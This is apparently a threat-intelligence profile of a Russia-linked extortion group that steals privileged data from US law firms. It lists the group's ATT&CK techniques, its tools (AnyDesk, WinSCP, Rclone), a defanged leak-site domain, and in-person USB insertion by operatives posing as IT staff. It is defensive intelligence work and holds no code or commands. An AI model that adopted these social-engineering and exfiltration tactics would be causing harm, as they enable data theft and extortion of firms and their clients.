SUBJECT PROFILE
A Russia-linked extortion group that spun off from the Conti post-shutdown ecosystem in 2022 and has now escalated to a historically unprecedented physical intrusion tactic: sending operatives in person to victim law firm offices, disguised as IT support staff, to insert USB drives and exfiltrate data directly. The FBI issued a FLASH-severity alert (FLASH-20260526-01) on May 26, 2026 — the highest-urgency classification — detailing this active Spring 2026 development. SRG deploys no malware or encryption, leaving minimal forensic artifacts and defeating most EDR tooling; 38+ firms have had data publicly posted and total attack count exceeds 100 confirmed incidents.
Financial extortion via pure data-theft and public disclosure threats, no ransomware encryption deployed; primary focus on attorney-client privileged data at US law firms
OPERATIONAL HISTORY
T1566 Callback Phishing (subscription billing lures), T1598.004 Vishing (IT impersonation over phone), Physical Intrusion (in-person USB/HDD insertion — Spring 2026 escalation), T1219 Remote Desktop Session hijacking (AnyDesk, Zoho Assist, legitimate RMM tools), T1048 Exfiltration via WinSCP / hidden Rclone, T1567 Exfiltration to OneDrive/Google Drive, T1078 Valid Account abuse, T1657 Pure data-theft extortion (no encryption), Victim employee/client harassment calls post-exfiltration
KNOWN INFRASTRUCTURE
Public clearnet leak site: business-data-leaks[.]com; lookalike IT helpdesk/support portal domains registered per campaign; WinSCP and Rclone for exfiltration; AnyDesk and Zoho Assist for remote access; physical operatives with removable USB/HDD media (Spring 2026 escalation); no custom malware — entirely LOTL and social engineering